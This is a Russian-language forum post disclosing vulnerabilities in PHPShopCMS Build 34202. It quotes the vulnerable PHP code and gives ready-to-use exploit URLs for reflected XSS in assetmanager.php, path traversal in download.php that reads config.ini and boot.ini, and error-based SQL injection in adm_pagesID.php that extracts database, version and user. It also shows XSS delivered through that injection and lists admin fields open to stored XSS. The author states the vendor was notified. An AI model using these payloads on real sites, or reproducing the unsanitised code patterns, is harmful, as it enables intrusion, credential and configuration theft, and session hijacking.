Старый 26.06.2011, 21:33   #1
Zhenechka
 
Аватар для Zhenechka
 
Регистрация: 08.11.2010
Сообщений: 10
Репутация: 5
По умолчанию PHPShopCMS

Product: PHPShopCMS
Vendor: http://www.phpshopcms.ru
Version: Build 34202, может ещё более ранние
Tested: Windows XP + XAMPP



Reflected XSS
В скрипте /phpshop/admpanel/assetmanager/assetmanager.php уязвимы параметры $name, $ffilter.

PHP код:
<input type="text" id="inpSource" name="inpSource" class="inpTxt" value="<?=$_GET['name']?>">
PHP код:
/assetmanager.php?name=")><script>alert("Zhenechka")</script><body+onload=' 
PHP код:
<input type="hidden" name="inpFilter" ID="inpFilter" value="<? echo $ffilter ?>">
PHP код:
/assetmanager.php?ffilter="><br><script>alert("Zhenechka")</script><input+value=" 

Path Traversal
Любой зарегенный пользователь (Промоутер, Оператор базы, Администратор) может скачать любой файл в системе.
Проверил на системном boot.ini и конфиге из папки самой цмс config.ini, размер не тестил, 10 Мб скачалось, больше непробовал.
Скрипт /phpshop/admpanel/dumper/backup/download.php

PHP код:
if(!empty($_GET['backup'])){
$_classPath="../../../";
include(
$_classPath."class/obj.class.php");
PHPShopObj::loadClass("base");
$backup=$_GET['backup'];
$PHPShopBase = new PHPShopBase($_classPath."inc/config.ini");
$PHPShopBase->chekAdmin();
header('Content-Type: application/force-download'); 
header('Content-Disposition: attachment; filename="'.$backup.'"'); 
header('Content-Length: '.filesize($backup));
readfile($backup); 
}
else exit(); 
PHP код:
/download.php?backup=../../../inc/config.ini 
PHP код:
/download.php?backup=../../../../../../../boot.ini 

Error-based SQL-Injection
Уязвимый скрипт /phpshop/admpanel/page/adm_pagesID.php

PHP код:
function Disp_cat_pod($category
 {  
     
$sql="select name from ".$GLOBALS['SysValue']['base']['table_name']." where id='$category'";  
     
$result=mysql_query($sql);  
     
$row mysql_fetch_array($result);  
     @
$name=$row['name'];  
     return @
$name." -> ";  
 } 
PHP код:
/adm_pagesID.php?id=1+or+1+group+by+concat(concat(database(),0x3a,version(),0x3a,user()),floor(rand(0)*2))having+min(0)-- 

XSS over SQL-Injection
Через предыдущую SQL в /phpshop/admpanel/page/adm_pagesID.php
PHP код:
/adm_pagesID.php?id=1+or+1+group+by+concat(0x3c7363726970743e616c65727428225a68656e6563686b6122293c2f7363726970743e,floor(rand(0)*2))having+min(0)--+group+by+x)a)-- 

Reflected XSS
Ну и ещё в админке куча хранимых XSS, некоторые работают только в админке, некоторые абсолютно на всех страницах.

PHP код:
Настройка => Система => Опции:
Поля "Название""Компания" не фильтруются

Настройка 
=> Keywords Titles:
Поле "Description" не фильтруется

Сервис 
=> Создать => Новая страница => Основное:
Поле "Заголовок" не фильтруется

Сервис 
=> Создать => Новая страница => Заголовки:
"Description" не фильтруется

Сервис 
=> Создать => Новые новости:
Поле "Заголовок" не фильтруется

Сервис 
=> Создать => Новый опрос:
Поле "Заголовок" не фильтруется

Сервис 
=> Создать => Новый текстовый блок:
Поле "Заголовок" не фильтруется

Сервис 
=> Создать => Новая ссылка:
Поля "Ресурс""Описание" не фильтруются

Сервис 
=> Создать => Новый комментарий:
Поля "Заголовок""Тема""Комментарий" не фильтруются 
Автор движка был уведомлён 11 мая. После этого выходило пара обновлений, но я их не тестил.
Анализировалась только стандартная конфигурация, доступная после установки.
Так же я ещё не ставил и не тестил дополнителные плагины, возможно сделаю это позднее.
__________________
888
Zhenechka вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot